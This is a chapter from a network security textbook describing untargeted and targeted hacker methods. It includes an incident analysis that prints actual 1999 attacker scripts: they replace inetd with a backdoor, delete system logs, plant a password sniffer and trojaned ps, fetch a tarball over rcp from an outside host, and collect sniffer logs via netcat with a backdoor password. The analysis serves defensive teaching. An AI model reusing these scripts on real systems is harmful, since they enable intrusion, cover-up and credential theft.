Chapter 13: Hacker Techniques 249 METHODS OF THE UNTARGETED HACKER Untargeted hackers are individuals who are not looking for access to particular informa - tion or organizations but instead are looking for any system that they can compromise. The skill level of such individuals varies from completely unskilled to very skilled. The motivation of untargeted hackers appears to be primarily the challenge of gaining access to systems. There may be some greed motivation among these hackers but what they are trying to acquire by their actions remains a mystery. Targets Untargeted hackers look for any system they can find. There are not normally any pre-identified targets. Occasionally, a network or domain name may be chosen to search for targets but these choices are considered to be random. Reconnaissance Reconnaissance for the untargeted hacker can take many forms. Some perform no recon- naissance whatsoever and just begin the attack without even determining if the systems that are being attacked are actually on the network. When reconnaissance is performed, it is usually done from systems that the hacker already has compromised so that the trail does not lead directly back to the hacker. Most often, the untargeted hacker will perform a stealth scan (also called an IP half scan) against a range of addresses to identify which systems are up. A stealth scan is an at- tempt to identify systems within an address range. It may also identify the services being offered by the identified system, depending on how the scan is performed. The stealth scan may be used in conjunction with a ping sweep of the address range. A ping sweep is simply an attempt to ping each address and see if a response is received. When a hacker performs a stealth scan, he sends a normal TCP SYN packet to the ad - dress and waits for the TCP SYN ACK response. If a response is received, the hacker sends a TCP RST packet to close the connection before it actually completes (see Figure 13-7). In many cases, this prevents evidence of the attempt from entering the target’s logs. Variations of this type of scan include reset scans where the hacker will send a TCP RST packet to the address. Normally, the reset packet will have no effect on the target sys - tem and no response from the target will be made. However, if the system does not exist, the router on the network where the target address would reside will respond with an ICMP Host Unreachable message. This message indicates that the system does not exist (see Figure 13-8). There are other variations on this concept that achieve similar results. It should be noted that while the reset scan can identify systems that exist on the network, it does not identify what services are running on the system as a stealth scan can. In a limited number of cases, an untargeted hacker will perform the reconnaissance in several steps. First, the hacker may choose (usually at random) a domain name and at - tempt to perform a zone transfer of DNS against this domain. A zone transfer lists all of 250 Network Security: A Beginner’s Guide Figure 13-7. Stealth scanning Figure 13-8. Reset scans TEAMFLY Team-Fly ® the systems and IP addresses that DNS knows about in the domain. Taking this list, the hacker may then run a tool such as Queso or Nmap to identify the operating system of the potential targets. A stealth scan may be used to identify the services on the targets and the final list may be used for the actual attacks. Reconnaissance is not limited to Internet addresses. Wardialing, another method that is used by hackers to identify potential victims, identifies systems that have modems and that answer incoming calls. A hacker will use a computer to dial a large number of phone numbers looking for a modem carrier. Thousands of phone numbers can be called during a single night. The more modern tools can differentiate between modems and fax ma - chines. Once the modems are identified, a hacker may return to each in turn to see what program is answering. Tools such as PC Anywhere receive more attention since they al - low a hacker to take control of the answering computer. Attack Methods Generally, the untargeted hacker will have a single exploit or a small group of exploits available. Using the reconnaissance methods identified above, the hacker will look for systems that may be vulnerable to the available exploits. When the systems are found, the exploits are used. Most untargeted hackers will identify individual systems and attempt the exploit on one system at a time. More sophisticated hackers will use the reconnaissance tools to identify many vulnerable systems and then write scripts that allow them to exploit all of these systems in a short amount of time. Use of Compromised Systems Once a system is compromised, hackers normally place back doors on the system so that they can access it again later. Some hackers will close the vulnerabilities that they used to gain initial access to the system so that no other hacker can gain control of “their system.” Hackers may copy the system’s password file back to some other system so that the passwords can be cracked. They will usually also load a password sniffer to capture passwords for other systems. Once compromised, a system may be used to at - tack other systems or for reconnaissance probes. As an example of how a compromised system may be used, I will discuss a real-world situation. On or about June 30, 1999, a large number of systems were attacked and success - fully penetrated across the Internet. The attack appeared to have been automated since the systems all were compromised within a very short period of time. Following an investiga - tion and examination of some of the compromised systems, it was concluded that the at - tacker used an RPC Tooltalk buffer overflow to gain entry to the systems. Once the systems were compromised, the attacker ran a script on each system that did three things: ▼ It closed the vulnerability that allowed entry into the system. ■ It loaded a back door in inetd to allow the attacker to return to the system. ▲ It started a password sniffer on the system. Chapter 13: Hacker Techniques 251 252 Network Security: A Beginner’s Guide After further investigation, the investigation team came into possession of scripts that appeared to be from the attacker’s own system. We verified that the scripts did in fact work on a compromised system. These scripts provided an automated means for the at - tacker to return to each compromised system and retrieve the sniffer logs. The sniffer logs would include user IDs and passwords from other systems on the local network. The next section provides the gory details of each script that we found so you can see how the at - tacker built his empire. Actual Attack Scripts The scripts that are discussed below were found on compromised systems and they show how a hacker could use a large number of compromised systems to gather other passwords. The files bd (a script), doc (a binary replacement for inetd), update (a password sniffer) and ps (a binary replacement for the ps command) were found in a file called neet.tar. We begin the examination of the intruder’s methods with the victim system. The sys - tem in question is thought to have been compromised through a buffer overflow in the Solaris RPC Tooltalk program. On the system we found a script called bd that was used to load the system. unset HISTFILE; unset SAVEHIST The hacker turns off the history file so that his actions will not be recorded there. cp doc /usr/sbin/inetd; chown root /usr/sbin/inetd; chgrp root /usr/sbin/inetd; touch 0716000097 /usr/sbin/inetd; The hacker copies doc over the existing inetd binary, changes the ownership, group, and time stamp of the file to match the original. rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb* The hacker removes the file doc that had been extracted from neet.tar, /tmp/bob (we will discuss this more later), messages (to remove information about the attack), statd, and rpc.ttdb (the Tooltalk binary). It is interesting that the hacker removes the method used to gain access to the system. rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec* The hacker removes additional logs to hide his actions. /usr/sbin/inetd -s; /usr/sbin/inetd -s; telnet localhost; /usr/sbin/inetd -s; The hacker starts two copies of inetd. He then tries to telnet to the localhost and starts a third copy of inetd. ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo chmod 700 boo ./boo The hacker locates the original version of inetd by looking for inetd and bob in the process table. He then creates a file called boo with the contents “kill –9 {inetd process id}”, changes the file permissions so the file can be executed, and executes it. This re - moves the original inetd process. ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo chmod 700 boo ./boo ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo chmod 700 boo ./boo rm -rf boo The hacker then locates the statd and ttdb processes and removes them in the same manner. mkdir /usr/man/tmp mv update ps /usr/man/tmp cd /usr/man/tmp echo 1 \"./update -s -o output\" > /kernel/pssys chmod 755 ps update ./update -s -o output & The hacker creates a directory under /usr/man and places the sniffer and the ps files there. He creates a startup script to restart the sniffer on system start and starts the sniffer. cp ps /usr/ucb/ps mv ps /usr/bin/ps touch 0716000097 /usr/bin/ps /usr/ucb/ps The hacker replaces the real ps with the new ps and changes its time stamp to corre - spond to the original. cd / ps -ef | grep bob | grep -v grep ps -ef | grep stat | grep -v grep ps -ef | grep update The hacker checks to make sure that all is running appropriately. The bd script is of great interest. Not only does it tell what was changed on the sys - tems, but it also gives a few clues as to how the hacker got into the system. The key item here is the reference to /tmp/bob. By examining how the hacker removed the original inetd process, we can surmise that inetd was running with a configuration file called /tmp/bob (inetd can be caused to run with a configuration file specified on the command Chapter 13: Hacker Techniques 253 line). We still do not know what was in /tmp/bob, but we must assume that the original exploit of Tooltalk allowed the hacker to restart inetd with a new configuration file. Another point of interest in the script is the fact that the hacker killed the processes that got him into the system initially. Here we might assume that the hacker did not wish others to attack one of his boxes. The one mistake in the script was the starting of three inetd processes. This caused two things to occur: multiple inetd processes were visible and messages appeared in /var/log/messages, indicating that the second and third inetd processes could not bind to the telnet or ftp ports. Once the initial exploit compromised the systems, the hacker used scripts to load each system with sniffers and back doors. These scripts were run from the attacking system. To load the victim systems, the hacker created three scripts. The first script is called massbd.sh. #!/bin/sh for i in `cat $1`; do (./bd.sh $i &);done This script takes an input file (assumed to be a list of IP addresses) and executes the bd.sh script (different than the bd script discussed above) against each one. The bd.sh script is a simple two-line script. #!/bin/sh ./bdpipe.sh | telnet $1 1524 The bd.sh script on the hacker’s machine provides some valuable information as to what the initial buffer overflow exploit did to the system. This script takes the command- line argument and pipes the commands from a third script, bdpipe.sh, into telnet. Note the destination port—1524. This script provides more of the evidence as to what the initial exploit did to the target system. The third script is bdpipe.sh. This set of commands is piped through telnet and actu - ally executed on the target system. #!/bin/sh echo "cd /tmp;" echo "rcp demos@xxx.yyy.zzz.aaa:neet.tar ./;" sleep 2 echo "tar -xvf neet.tar;" sleep 1 echo "./bd;" sleep 10 echo "rm -rf neet.tar bd update*;" sleep 10 echo "exit;" The bdpipe.sh script remote copies the neet.tar file from some other system, opens the file, and executes the bd script that we found on the victim systems. After the bd script 254 Network Security: A Beginner’s Guide executes on the victim, this script is supposed to remove neet.tar bd, and update from /tmp. This did not work on all of the exploited systems, thus allowing us to find the neet.tar file and its contents. From these three scripts, it is obvious that the hacker had intended this attack to com - promise a large number of systems in a short period of time. While the scripts are not dif - ficult to construct, a fair amount of work went into building all of the pieces so that the attack could be extremely widespread. From the information that we were able to gather, it appears that the hacker was not done after loading the sniffer on all of the victims. We found three other scripts that were intended to retrieve the sniffed passwords. The first script is called mget.sh. for i in `cat $1` ; do (./sniff.sh $i &) ; done The mget.sh script takes a list of IP addresses and uses them to call sniff.sh. The sniff.sh script is a two-line script. #!/bin/sh ./getsniff.sh | ./nc -p 53982 $1 23 >> $1.log Sniff.sh takes the IP address and uses it to make a connection to the target system on port 23 (telnet) but from a specific source port (53982). The program nc (called netcat) al- lows the hacker to make connections to any port from any port. Finding this script told us what the back door was in the replacement inetd. If a connection were made to telnet from port 53982, the replacement inetd would look for a password and, if provided, give a root shell. The third script is called getshniff.sh. This script is piped through the nc connection and executed on the target system. #!/bin/sh sleep 2 echo "oir##t" sleep 1 echo "cd /usr" sleep 1 echo "cd man" echo "cd tmp" sleep 2 echo "cat output*" sleep 1 echo "exit" Getsniff.sh provided us with the password to be used with the replacement inetd (oir##t). This script would provide the input to nc to finish the connection to the target system and then retrieve the output file from the sniffer. Chapter 13: Hacker Techniques 255 Putting all of these scripts together gives a good picture of what the hacker was doing. Once a target system was compromised, he could remotely retrieve the sniffer logs and thus compromise many other systems that were not penetrated during the first attack. The automation of this compromise and retrieval process would allow the hacker to gain access to an extremely large number of systems very quickly and then to broaden the scope of his success by retrieving and storing additional passwords. METHODS OF THE TARGETED HACKER A targeted hacker is attempting to successfully penetrate or damage a particular organi - zation. Hackers who target a specific organization are motivated by a desire for some - thing that organization has (usually information of some type). In some cases, the hacker is choosing to do damage to a particular organization for some perceived wrong. Many of the targeted DoS attacks occur in this way. The skill level of targeted hackers tends to be higher than that for untargeted hackers. Targets The target of the attack is chosen for a reason. Perhaps the target has information that is of interest to the hacker. Perhaps the target is of interest to a third party who has hired the hacker to get some information. Whatever the reason, the target is the organization, not necessarily just one system within the organization. Reconnaissance Reconnaissance for a targeted attack takes several forms: address reconnaissance, phone number reconnaissance, system reconnaissance, business reconnaissance, and physical reconnaissance. Address Reconnaissance Address reconnaissance is simply the identification of the address space in use by the tar - get organization. This information can be found from a number of locations. First, DNS can be used to identify the address of the organization’s Web server. DNS will also pro - vide the address of the primary DNS server for the domain and the mail server addresses for the organization. Taking the addresses to the American Registry of Internet Numbers (ARIN) (http://www.arin.net) will show what addresses belong to the organization. Name searches can also be conducted through ARIN to find other address blocks as - signed to the target organization. Additional domain names that may be assigned to the organization can be found by doing text searches at Network Solutions (http://www.networksolutions.com). For each additional domain that is found, DNS can be used to identify additional Web servers, mail servers, and address ranges. All of this information can be found without alerting the target. 256 Network Security: A Beginner’s Guide . script. #!/bin/sh ./getsniff.sh | ./nc -p 5398 2 $1 23 >> $1.log Sniff.sh takes the IP address and uses it to make a connection to the target system on port 23 (telnet) but from a specific source port ( 5398 2). The program. list, the hacker may then run a tool such as Queso or Nmap to identify the operating system of the potential targets. A stealth scan may be used to identify the services on the targets and the final. not limited to Internet addresses. Wardialing, another method that is used by hackers to identify potential victims, identifies systems that have modems and that answer incoming calls. A hacker